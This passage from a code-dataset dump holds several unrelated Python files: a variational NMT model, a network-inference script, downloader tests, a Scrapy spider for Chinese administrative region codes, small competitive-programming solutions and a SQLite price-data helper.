(False,e)\n","sub_path":"uchicagoldr/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"74460966","text":"import numpy as np\nimport glob\nimport os\nfrom hparams import hparams\nimport pickle\n\nroot_dir = \"/hd0/speechsplit/preprocessed/spmel\"\nfeat_dir = \"/hd0/speechsplit/preprocessed/raptf0\"\nfile_name = \"004/004_179.npy\"\n\nmetadata = pickle.load(open('/hd0/speechsplit/preprocessed/spmel/train.pkl', \"rb\"))\n\nsbmt_i = metadata[0]\nemb_org = torch.from_numpy(sbmt_i[1]).to(device)\n\nmelsp = np.load(os.path.join(root_dir, file_name))\nf0_org = np.load(os.path.join(feat_dir, file_name))\n\nprint(melsp[0:, :].shape)\n\nlen_crop = np.random.randint(hparams.min_len_seq, hparams.max_len_seq+1, size=2)\nprint(len(melsp) - len_crop)\nleft = np.random.randint(0, len(melsp)-len_crop, size=2)\nprint(left)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"232135368","text":"#####\n#Based on FastInf Algorithm by Altan Alpay, Deniz Demir, Jie Yang for their CS 224W Project (2011)\n\nimport snap\nimport pickle as pkl\nimport numpy as np\nimport sys\nfrom collections import defaultdict\nimport os\nimport math\nimport operator\n\nk=300\nd=1000000\nalpha=1\n\ndef readfile(filename):\n\tcascades_list = []\n\twith open(filename) as fp:\n\t\tfor line in fp:\n\t\t\tcascades_list.append(line)\n\n\tcascades_arr = []\n\n\tfor casc in cascades_list:\n\t\tlinesplit = [x for x in casc.split(',')]\n\t\tnodes = []\n\t\tfor node in range(0,len(linesplit),2):\n\t\t\tnodes.append((int(linesplit[node]),float(linesplit[node+1])))\n\t\tcascades_arr.append(nodes)\n\n\t# print cascades_arr\n\treturn cascades_arr\n\ndef fastInf(C):\n\tE_exp = {}\n\tE_pl = {}\n\tE_simple = {}\n\tfor cascade in C:\n\t\tfor i in range(0,len(cascade)):\n\t\t\tfor j in range(i+1, min(i+1+d, len(cascade))):\n\t\t\t\tni = cascade[i][0]\n\t\t\t\tnj = cascade[j][0]\n\t\t\t\tif (ni,nj) not in E_exp:\n\t\t\t\t\tE_exp[(ni,nj)] = 0\n\t\t\t\t\tE_simple[(ni,nj)]=0\n\t\t\t\t\tE_pl[(ni,nj)]=0\n\t\t\t\tE_exp[(ni,nj)] += calc_weight_exponential(cascade,i,j)\n\t\t\t\tE_pl[(ni,nj)] += calc_weight_powerlaw(cascade,i,j)\n\t\t\t\tE_simple[(ni,nj)] += calc_weight(i,j)\n\n\treturn E_exp,E_pl,E_simple\n\ndef calc_weight(i,j):\n\treturn 1.0/(j-i)\n\ndef calc_weight_exponential(cascade,i,j):\n\tif cascade[j][1]-cascade[i][1] != 0:\n\t\tnum = np.exp(alpha*(cascade[j][1]-cascade[i][1])/100)\n\telse:\n\t\treturn 0.0\n\tdenom = 0.0\n\tfor n in range(0,j):\n\t\tif cascade[j][1]-cascade[n][1] != 0:\n\t\t\tdenom += np.exp(alpha*(cascade[j][1]-cascade[n][1])/100)\n\n\treturn (num*1.0)/(denom*1.0)\n\ndef calc_weight_powerlaw(cascade,i,j):\n\tif cascade[j][1]-cascade[i][1] != 0:\n\t\tnum = (cascade[j][1]-cascade[i][1])**(-1.0*alpha)\n\telse: \n\t\treturn 0.0\n\tdenom = 0.0\n\tfor n in range(0,j):\n\t\tif cascade[j][1]-cascade[n][1] != 0:\n\t\t\tdenom += (cascade[j][1]-cascade[n][1])**(alpha*-1.0)\n\treturn (num*1.0)/(denom*1.0)\n\ndef output_network(E_exp,E_pl,E_simple):\n\tE_exp_s = sorted(E_exp.items(), key=operator.itemgetter(1), reverse=True)\n\tE_simple_s = sorted(E_simple.items(), key=operator.itemgetter(1), reverse=True)\n\tE_pl_s = sorted(E_pl.items(), key=operator.itemgetter(1), reverse=True)\n\tf_exp = open('../../data/fastinf/exp_fastinf_edges.txt','w+')\n\tf_simp = open('../../data/fastinf/powerlaw_fastinf_edges.txt','w+')\n\tf_pl = open('../../data/fastinf/simple_fastinf_edges.txt', 'w+')\n\tf2_exp = open('../../data/fastinf/exp_fastinf_loadedgelist.txt', 'w+')\n\tf2_pl = open('../../data/fastinf/pl_fastinf_loadedgelist.txt', 'w+')\n\tf2_simp = open('../../data/fastinf/simp_fastinf_loadedgelist.txt', 'w+')\n\n\n\n\n\tfor i in range(0,k):\n\t\tf_pl.write('%s\\n' % str(E_pl_s[i]))\n\t\tf_exp.write('%s\\n' % str(E_exp_s[i]))\n\t\tf_simp.write('%s\\n' % str(E_simple_s[i]))\n\n\t\tf2_pl.write('%s %s\\n' % (str(E_pl_s[i][0][0]), str(E_pl_s[i][0][1])))\n\t\tf2_exp.write('%s %s\\n' % (str(E_exp_s[i][0][0]), str(E_exp_s[i][0][1])))\n\t\tf2_simp.write('%s %s\\n' % (str(E_simple_s[i][0][0]), str(E_simple_s[i][0][1])))\n\n\n\tf_exp.close()\n\tf_pl.close()\n\tf_simp.close()\n\n\ndef main():\n\tC = readfile(\"../../data/full_cascade_fastinf_noun.txt\")\n\tE_exp,E_pl,E_simple = fastInf(C)\n\toutput_network(E_exp,E_pl,E_simple)\n\n\n\nmain()","sub_path":"src/gen_networks/fastinf_implementation.py","file_name":"fastinf_implementation.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255674692","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom aevnmt.components import RNNEncoder, tile_rnn_hidden, tile_rnn_hidden_for_decoder\nfrom aevnmt.dist import NormalLayer\n\nfrom itertools import chain\n\nclass InferenceNetwork(nn.Module):\n\n def __init__(self, src_embedder, hidden_size, latent_size, bidirectional, num_enc_layers, cell_type):\n \"\"\"\n :param src_embedder: uses this embedder, but detaches its output from the graph as to not compute\n gradients for it.\n \"\"\"\n super().__init__()\n self.src_embedder = src_embedder\n emb_size = src_embedder.embedding_dim\n self.encoder = RNNEncoder(emb_size=emb_size,\n hidden_size=hidden_size,\n bidirectional=bidirectional,\n dropout=0.,\n num_layers=num_enc_layers,\n cell_type=cell_type)\n encoding_size = hidden_size if not bidirectional else hidden_size * 2\n self.normal_layer = NormalLayer(encoding_size, hidden_size, latent_size)\n\n def forward(self, x, seq_mask_x, seq_len_x):\n x_embed = self.src_embedder(x).detach()\n encoder_outputs, _ = self.encoder(x_embed, seq_len_x)\n avg_encoder_output = (encoder_outputs * seq_mask_x.unsqueeze(-1).type_as(encoder_outputs)).sum(dim=1)\n return self.normal_layer(avg_encoder_output)\n\n def parameters(self, recurse=True):\n return chain(self.encoder.parameters(recurse=recurse), self.normal_layer.parameters(recurse=recurse))\n\n def named_parameters(self, prefix='', recurse=True):\n return chain(self.encoder.named_parameters(prefix='', recurse=True), self.normal_layer.named_parameters(prefix='', recurse=True), )\n\nclass AEVNMT(nn.Module):\n\n def __init__(self, tgt_vocab_size, emb_size, latent_size, encoder, decoder, language_model,\n pad_idx, dropout, tied_embeddings):\n super().__init__()\n self.latent_size = latent_size\n self.pad_idx = pad_idx\n self.encoder = encoder\n self.decoder = decoder\n self.language_model = language_model\n self.tgt_embedder = nn.Embedding(tgt_vocab_size, emb_size, padding_idx=pad_idx)\n self.tied_embeddings = tied_embeddings\n if not tied_embeddings:\n self.output_matrix = nn.Parameter(torch.randn(tgt_vocab_size, decoder.hidden_size))\n self.dropout_layer = nn.Dropout(p=dropout)\n self.encoder_init_layer = nn.Sequential(nn.Linear(latent_size, encoder.hidden_size),\n nn.Tanh())\n self.decoder_init_layer = nn.Sequential(nn.Linear(latent_size, decoder.hidden_size),\n nn.Tanh())\n self.lm_init_layer = nn.Sequential(nn.Linear(latent_size, language_model.hidden_size),\n nn.Tanh())\n self.inf_network = InferenceNetwork(src_embedder=self.language_model.embedder,\n hidden_size=encoder.hidden_size,\n latent_size=latent_size,\n bidirectional=encoder.bidirectional,\n num_enc_layers=encoder.num_layers,\n cell_type=encoder.cell_type)\n\n # This is done because the location and scale of the prior distribution are not considered\n # parameters, but are rather constant. Registering them as buffers still makes sure that\n # they will be moved to the appropriate device on which the model is run.\n self.register_buffer(\"prior_loc\", torch.zeros([latent_size]))\n self.register_buffer(\"prior_scale\", torch.ones([latent_size]))\n\n def inference_parameters(self):\n return self.inf_network.parameters()\n\n def generative_parameters(self):\n # TODO: separate the generative model into a GenerativeModel module\n # within that module, have two modules, namely, LanguageModel and TranslationModel\n return chain(self.lm_parameters(), self.tm_parameters())\n\n def lm_parameters(self):\n return chain(self.language_model.parameters(), self.lm_init_layer.parameters())\n\n def tm_parameters(self):\n params = chain(self.encoder.parameters(),\n self.decoder.parameters(),\n self.tgt_embedder.parameters(),\n self.encoder_init_layer.parameters(),\n self.decoder_init_layer.parameters())\n if not self.tied_embeddings:\n params = chain(params, self.output_matrix)\n return params\n\n def approximate_posterior(self, x, seq_mask_x, seq_len_x):\n \"\"\"\n Returns an approximate posterior distribution q(z|x).\n \"\"\"\n return self.inf_network(x, seq_mask_x, seq_len_x)\n\n def prior(self):\n return torch.distributions.Normal(loc=self.prior_loc,\n scale=self.prior_scale)\n\n def src_embed(self, x):\n\n # We share the source embeddings with the language_model.\n x_embed = self.language_model.embedder(x)\n x_embed = self.dropout_layer(x_embed)\n return x_embed\n\n def tgt_embed(self, y):\n y_embed = self.tgt_embedder(y)\n y_embed = self.dropout_layer(y_embed)\n return y_embed\n\n def encode(self, x, seq_len_x, z):\n x_embed = self.src_embed(x)\n hidden = tile_rnn_hidden(self.encoder_init_layer(z), self.encoder.rnn)\n return self.encoder(x_embed, seq_len_x, hidden=hidden)\n\n def init_decoder(self, encoder_outputs, encoder_final, z):\n self.decoder.init_decoder(encoder_outputs, encoder_final)\n hidden = tile_rnn_hidden_for_decoder(self.decoder_init_layer(z), self.decoder)\n return hidden\n\n def generate(self, pre_output):\n W = self.tgt_embedder.weight if self.tied_embeddings else self.output_matrix\n return F.linear(pre_output, W)\n\n def run_language_model(self, x, z):\n \"\"\"\n Runs the language_model.\n\n :param x: unembedded source sentence\n :param z: a sample of the latent variable\n \"\"\"\n hidden = tile_rnn_hidden(self.lm_init_layer(z), self.language_model.rnn)\n return self.language_model(x, hidden=hidden)\n\n def forward(self, x, seq_mask_x, seq_len_x, y, z):\n\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n lm_logits = self.run_language_model(x, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n all_att_weights = []\n max_time = y.size(1)\n for t in range(max_time):\n prev_y = y[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, att_weights = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n all_att_weights.append(att_weights)\n\n return torch.cat(tm_logits, dim=1), lm_logits, torch.cat(all_att_weights, dim=1)\n\n def compute_conditionals(self, x_in, seq_mask_x, seq_len_x, x_out, y_in, y_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param x_out: [batch_size, max_length]\n :param y_in: [batch_size, max_length]\n :param y_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(x|z), log p(y|z,x)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n # [max_length, batch_size, vocab_size]\n lm_logits = self.run_language_model(x_in, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n max_time = y_in.size(1)\n for t in range(max_time):\n prev_y = y_in[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, _ = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n # [max_length, batch_size, vocab_size]\n tm_logits = torch.cat(tm_logits, dim=1)\n\n # [batch_size, max_length, vocab_size]\n lm_logits = lm_logits.permute(0, 2, 1)\n tm_logits = tm_logits.permute(0, 2, 1)\n\n # [batch_size]\n tm_loss = F.cross_entropy(tm_logits, y_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n lm_loss = F.cross_entropy(lm_logits, x_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -lm_loss, -tm_loss\n\n def compute_lm_likelihood(self, x_in, seq_mask_x, seq_len_x, x_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param x_out: [batch_size, max_length]\n :param y_in: [batch_size, max_length]\n :param y_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(x|z), log p(y|z,x)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n # [max_length, batch_size, vocab_size]\n lm_logits = self.run_language_model(x_in, z)\n # [batch_size, max_length, vocab_size]\n lm_logits = lm_logits.permute(0, 2, 1)\n\n lm_loss = F.cross_entropy(lm_logits, x_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -lm_loss\n\n def compute_tm_likelihood(self, x_in, seq_mask_x, seq_len_x, y_in, y_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param x_out: [batch_size, max_length]\n :param y_in: [batch_size, max_length]\n :param y_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(x|z), log p(y|z,x)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n max_time = y_in.size(1)\n for t in range(max_time):\n prev_y = y_in[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, _ = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n # [max_length, batch_size, vocab_size]\n tm_logits = torch.cat(tm_logits, dim=1)\n\n # [batch_size, max_length, vocab_size]\n tm_logits = tm_logits.permute(0, 2, 1)\n\n # [batch_size]\n tm_loss = F.cross_entropy(tm_logits, y_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -tm_loss\n\n def loss(self, tm_logits, lm_logits, targets_y, targets_x, qz, free_nats=0.,\n KL_weight=1., reduction=\"mean\"):\n \"\"\"\n Computes an estimate of the negative evidence lower bound for the single sample of the latent\n variable that was used to compute the categorical parameters, and the distributions qz\n that the sample comes from.\n\n :param tm_logits: translation model logits, the unnormalized translation probabilities [B, T_y, vocab_size]\n :param lm_logits: language model logits, the unnormalized language probabilities [B, T_x, vocab_size]\n :param targets_y: target labels target sentence [B, T_y]\n :param targets_x: target labels source sentence [B, T_x]\n :param qz: distribution that was used to sample the latent variable.\n :param free_nats: KL = min(free_nats, KL)\n :param KL_weight: weight to multiply the KL with, applied after free_nats\n :param reduction: what reduction to apply, none ([B]), mean ([]) or sum ([])\n \"\"\"\n\n # Compute the loss for each batch element. Logits are of the form [B, T, vocab_size],\n # whereas the cross-entropy function wants a loss of the form [B, vocab_svocab_sizee, T].\n tm_logits = tm_logits.permute(0, 2, 1)\n tm_loss = F.cross_entropy(tm_logits, targets_y, ignore_index=self.pad_idx, reduction=\"none\")\n tm_loss = tm_loss.sum(dim=1)\n\n # Compute the language model categorical loss.\n lm_loss = self.language_model.loss(lm_logits, targets_x, reduction=\"none\")\n\n # Compute the KL divergence between the distribution used to sample z, and the prior\n # distribution.\n pz = self.prior().expand(qz.mean.size())\n\n # The loss is the negative ELBO.\n tm_log_likelihood = -tm_loss\n lm_log_likelihood = -lm_loss\n\n KL = torch.distributions.kl.kl_divergence(qz, pz)\n raw_KL = KL.sum(dim=1)\n KL = KL.sum(dim=1)\n\n if free_nats > 0:\n KL = torch.clamp(KL, min=free_nats)\n KL *= KL_weight\n elbo = tm_log_likelihood + lm_log_likelihood - KL\n loss = -elbo\n\n out_dict = {\n 'tm_log_likelihood': tm_log_likelihood,\n 'lm_log_likelihood': lm_log_likelihood,\n 'KL': KL,\n 'raw_KL': raw_KL\n }\n\n # Return differently according to the reduction setting.\n if reduction == \"mean\":\n out_dict['loss'] = loss.mean()\n elif reduction == \"sum\":\n out_dict['loss'] = loss.sum()\n elif reduction == \"none\":\n out_dict['loss'] = loss\n else:\n raise Exception(f\"Unknown reduction option {reduction}\")\n\n return out_dict\n","sub_path":"aevnmt/models/aevnmt.py","file_name":"aevnmt.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"439493178","text":"# -*- coding: UTF-8 -*-\n\"\"\"Downloader Tests\"\"\"\nimport tempfile\nfrom os import unlink\nfrom os.path import join, abspath\n\nimport pytest\n\nfrom hdx.utilities.downloader import Download, DownloadError\nfrom hdx.utilities.path import script_dir\n\n\nclass TestDownloader:\n @pytest.fixture\n def fixtureurl(self):\n return 'https://raw.githubusercontent.com/OCHA-DAP/hdx-python-api/master/tests/fixtures/test_data.csv'\n\n @pytest.fixture\n def fixturenotexistsurl(self):\n return 'https://raw.githubusercontent.com/OCHA-DAP/hdx-python-api/master/tests/fixtures/NOTEXIST.csv'\n\n def test_get_path_for_url(self, fixtureurl):\n scriptdir = script_dir(TestDownloader)\n path = Download.get_path_for_url(fixtureurl, scriptdir)\n assert abspath(path) == abspath(join(scriptdir, 'test_data.csv'))\n downloader_folder = join(scriptdir, '..', '..', 'fixtures', 'downloader')\n path = Download.get_path_for_url(fixtureurl, downloader_folder)\n assert abspath(path) == abspath(join(downloader_folder, 'test_data3.csv'))\n\n def test_setup_stream(self, fixtureurl, fixturenotexistsurl):\n with pytest.raises(DownloadError), Download() as download:\n download.setup_stream('NOTEXIST://NOTEXIST.csv')\n with pytest.raises(DownloadError), Download() as download:\n download.setup_stream(fixturenotexistsurl)\n with Download() as download:\n download.setup_stream(fixtureurl)\n headers = download.response.headers\n assert headers['Content-Length'] == '728'\n\n def test_hash_stream(self, fixtureurl):\n with Download() as download:\n download.setup_stream(fixtureurl)\n md5hash = download.hash_stream(fixtureurl)\n assert md5hash == 'da9db35a396cca10c618f6795bdb9ff2'\n\n def test_download_file(self, fixtureurl, fixturenotexistsurl):\n tmpdir = tempfile.gettempdir()\n with pytest.raises(DownloadError), Download() as download:\n download.download_file('NOTEXIST://NOTEXIST.csv', tmpdir)\n with pytest.raises(DownloadError), Download() as download:\n download.download_file(fixturenotexistsurl)\n with Download() as download:\n f = download.download_file(fixtureurl, tmpdir)\n fpath = abspath(f)\n unlink(f)\n assert fpath == abspath(join(tmpdir, 'test_data.csv'))\n\n def test_download(self, fixtureurl, fixturenotexistsurl):\n with pytest.raises(DownloadError), Download() as download:\n download.download('NOTEXIST://NOTEXIST.csv')\n with pytest.raises(DownloadError), Download() as download:\n download.download(fixturenotexistsurl)\n with Download() as download:\n result = download.download(fixtureurl)\n assert result.headers['Content-Length'] == '728'\n","sub_path":"tests/hdx/utilities/test_downloader.py","file_name":"test_downloader.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10067411","text":"import set\nimport sys\n\n\ndef input_filename():\n \"\"\"\n Function to input the filename from the handle the input from the user\n \"\"\"\n filename = input(\"Please enter the filename (Eg: input1.txt): \")\n if not filename.endswith(\".txt\"):\n print(\"\\nPlease check the filename given. It needs to be a txt file.\")\n return filename\n\n\ndef read_from_file(filename):\n \"\"\"\n Function to read the lines from the input file and create new Card object for each line read\n :rtype: List of Card objects\n \"\"\"\n card_list = []\n try:\n file = open(filename, \"r\")\n for card_string in file:\n cards = set.create_cards(card_string)\n if cards is not None:\n card_list.append(cards)\n return card_list\n except Exception as e:\n sys.exit(f\"\\nFailed to open file: {e}\")\n","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"414732162","text":"import scrapy\nfrom RegionCode.items import RegioncodeItem\nfrom bs4 import BeautifulSoup\n\nclass CodeSpider(scrapy.Spider):\n\tname = 'RegionCode'\n\tallowed_domains = [\"stats.gov.cn\"]\n\tstart_urls = [\"http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/41.html\",]\n\n\t# def parse(self, response):\n\t# \tprint(response.url)\n\t# \tprovince_tds = response.xpath('//tr[@class=\"provincetr\"]//td')\n\t# \titem = RegioncodeItem()\n\t# \tfor td in province_tds:\n\t# \t\tpro_url_tail = td.xpath('a/@href')[0].extract()\n\t# \t\tpro_name = td.xpath('a/text()')[0].extract()\n\t# \t\titem['code'] = pro_url_tail[:-5]\n\t# \t\titem['name'] = pro_name\n\t# \t\tyield item\n\n\n\t# \t\tpro_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/' + pro_url_tail\n\t# \t\tyield scrapy.Request(url=pro_url, callback=self.parse_province, dont_filter=True)\n\n\tdef parse(self, response):\n\t\tprint(response.url)\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tcitytrs = soup.find_all('tr', attrs={'class':'citytr'})\n\t\titem = RegioncodeItem()\n\t\tfor ctr in citytrs:\n\t\t\tcitytds = ctr.find_all('td')\n\t\t\tcity_url_tail = citytds[0].find('a')['href']\n\t\t\tcity_name = citytds[1].getText()\n\t\t\tcity_code = citytds[0].getText()\n\t\t\titem['code'] = city_code\n\t\t\titem['name'] =city_name\n\t\t\tyield item\n\n\t\t\tcity_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/' + city_url_tail\n\t\t\tyield scrapy.Request(city_url, callback=self.parse_city)\n\n\tdef parse_city(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tcountytrs = soup.find_all('tr', attrs={'class':'countytr'})\n\t\tfor countytr in countytrs:\n\t\t\tlink = countytr.find_all('a')\n\t\t\tif len(link) == 0:\n\t\t\t\ttds = countytr.find_all('td')\n\t\t\t\tcounty_code = tds[0].getText()\n\t\t\t\tcounty_name = tds[1].getText()\n\t\t\t\titem['code'] = county_code\n\t\t\t\titem['name'] = county_name\n\t\t\t\tyield item\n\t\t\telse:\n\t\t\t\tcounty_url_tail = link[0]['href']\n\t\t\t\ttds = countytr.find_all('td')\n\t\t\t\tcounty_code = tds[0].getText()\n\t\t\t\tcounty_name = tds[1].getText()\n\t\t\t\titem['code'] = county_code\n\t\t\t\titem['name'] = county_name\n\t\t\t\tyield item\n\n\t\t\t\tcounty_url = response.url[:-9] + county_url_tail\n\t\t\t\tyield scrapy.Request(county_url, callback=self.parse_county)\n\n\tdef parse_county(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\ttowntrs = soup.find_all('tr', attrs={'class':'towntr'})\n\t\tfor ttr in towntrs:\n\t\t\ttds = ttr.find_all('td')\n\t\t\ttown_code = tds[0].getText()\n\t\t\ttown_name = tds[1].getText()\n\t\t\tlink = ttr.find_all('a')[0]['href']\n\t\t\titem['code'] = town_code\n\t\t\titem['name'] = town_name\n\t\t\tyield item\n\n\t\t\ttown_url = response.url[:-11] + link\n\t\t\tyield scrapy.Request(town_url, callback=self.parse_town)\n\n\tdef parse_town(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tnctrs = soup.find_all('tr', attrs={'class':'villagetr'})\n\t\tfor nctr in nctrs:\n\t\t\ttds = nctr.find_all('td')\n\t\t\tnc_code = tds[0].getText()\n\t\t\tnc_name = tds[2].getText()\n\t\t\titem['code'] = nc_code\n\t\t\titem['name'] = nc_name\n\t\t\tyield item\n","sub_path":"space_history/python_space/history/房屋数据/Python-Spider-github-1108/spider_stat/RegionCode_scrapy/spiders/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201971143","text":"numbers = list(map(int, input().split(' ')))\nnumbers.sort()\n\nfirstDiff = numbers[1] - numbers[0]\nsecondDiff = numbers[2] - numbers[1]\n\nif firstDiff == secondDiff : \n print(numbers[2] + firstDiff)\nelif secondDiff < firstDiff :\n print(numbers[0] + secondDiff)\nelse :\n print(numbers[1] + firstDiff)\n#### 굳굳 :2\n#### 개깔끔: 2\n\n","sub_path":"Week1/Day6/lye_2997.py","file_name":"lye_2997.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19955243","text":"from collections import deque\nn=int(input())\ngl=[[]for _ in range(n)]\nfor _ in range(n-1):\n a,b=map(int, input().split())\n a-=1\n b-=1\n gl[a].append(b)\n gl[b].append(a)\n\nal=list(map(int, input().split()))\nal.sort(reverse=True)\nqa=deque(al)\n\nvisited=[-1]*n\nq=deque()\nq.append(0)\nvisited[0]=qa.popleft()\nwhile q:\n poped=q.popleft()\n for v in gl[poped]:\n if visited[v]!=-1:continue\n visited[v]=qa.popleft()\n q.append(v)\n\nprint(sum(al[1:]))\nprint(*visited)","sub_path":"2_kakomon/arc_like/m_solutions2019_d.py","file_name":"m_solutions2019_d.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"500591417","text":"# -*- coding: utf-8 -*-\nimport os, time\nimport sqlite3\nfrom utils.rwlogging import log\n\nclass SqliteDB():\n\tdef __init__(self):\n\t\tself.conn = sqlite3.connect(os.path.join(os.path.dirname(__file__), 'sqlite.db').replace('\\\\','/')\n,timeout=10, check_same_thread=False)\n\t\tself.conn.row_factory = sqlite3.Row\n\t\tself.initTables()\n\tdef emptyTables(self):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('DELETE FROM XAGUSD1440')\n\t\tself.conn.commit()\n\t\tlog.debug('Emptied')\n\t\t\n\tdef commit(self):\n\t\tself.conn.commit()\n\t\t\n\tdef addData(self, table, data):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('SELECT DTLONG FROM ' + table + ' WHERE DTLONG=?', (long(data[0]),))\n\t\tif cur.fetchone() == None:\n\t\t\t#log.debug('inserting ' + table + ' : ')\n\t\t\t#log.info(data)\n\t\t\t#cur.execute('INSERT INTO PRICE(DTLONG,DDATE,DTIME,DCLOSE,DHIGH,DLOW,DOPEN,DRMB,DVOL,DINX1,DINX2,DINX3,DINX4,DINX5,DINX6,DNOTES) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', data)\n\t\t\tcur.execute('INSERT INTO ' + table + ' VALUES(?,?,?,?,?,?,?,?,?,?,?)', data)\n\t\telse:\n\t\t\tlog.info('** data duplicate ** ' + table + ' : ')\n\t\t\tlog.info(data)\n\t\tcur.close()\n\t\treturn\n\t\t\n\tdef getAllPrices(self, table):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('''SELECT \nDTLONG as dtlong, DDATE as date, DTIME as time, DOPEN as open, \nDHIGH as high, DLOW as low, DCLOSE as close, DVOL as vol, \nDRMB as rmb, DCHAN as chan, DPERC as per FROM ''' + table + ' ORDER BY DTLONG')\n\t\treturn cur.fetchall()\n\t\n\tdef createIndicator(self, dtype, itype, subtype, arg1 = 0, arg2 = 0, arg3 = 0, arg4 = 0, arg5 = 0):\n\t\tself.table = dtype + '_' + itype + '_' + subtype + '_' + str(arg1) + '_' + str(arg2) + '_' + str(arg3) + '_' + str(arg4) + '_' + str(arg5)\n\t\tlog.info('create table ' + self.table)\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS ''' + self.table + '''\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nVAL1 REAL,\nVAL2 REAL,\nVAL3 REAL,\nVAL4 REAL,\nVAL5 REAL,\nVAL6 REAL,\nVAL7 REAL,\nVAL8 REAL\n)\n''')\n\t\tcur.execute('DELETE FROM ' + self.table)\n\t\tself.conn.commit()\n\t\tcur.close()\n\t\treturn self\n\t\t\n\tdef addIndicate(self, dtlong, val1, val2 = 0, val3 = 0, val4 = 0, val5 = 0, val6 = 0, val7 = 0, val8 = 0):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('SELECT DTLONG FROM ' + self.table + ' WHERE DTLONG=?', (dtlong,))\n\t\tif cur.fetchone() == None:\n\t\t\tdt = 